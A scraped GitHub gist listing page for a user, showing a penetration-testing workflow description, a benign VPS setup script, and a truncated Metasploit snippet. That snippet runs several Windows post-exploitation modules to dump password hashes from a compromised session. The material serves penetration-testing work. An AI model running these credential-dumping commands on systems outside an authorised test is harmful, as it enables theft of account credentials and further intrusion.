Skip to content

Instantly share code, notes, and snippets.

View Jineeshak's full-sized avatar
🎯
Focusing

Jineeshak

🎯
Focusing
View GitHub Profile
@Jineeshak
Jineeshak / offsec.md
Created October 21, 2017 04:09 — forked from trietptm/offsec.md
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

@Jineeshak
Jineeshak / prep-vps.sh
Created October 18, 2017 09:26
Download tools and configure settings for new VPSes and VMs.
#!/bin/bash
# Update OS
apt-get update
apt-get upgrade -y
apt-get dist-upgrade -y
# Pip
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
rm get-pip.py
@Jineeshak
Jineeshak / offsec.md
Created October 18, 2017 09:26 — forked from jivoi/offsec.md
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

setg SESSION 1
use post/windows/gather/smart_hashdump
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/gather/credentials/mcafee_vse_hashdump
run
use post/windows/gather/credentials/mssql_local_hashdump
run
use post/windows/gather/hashdump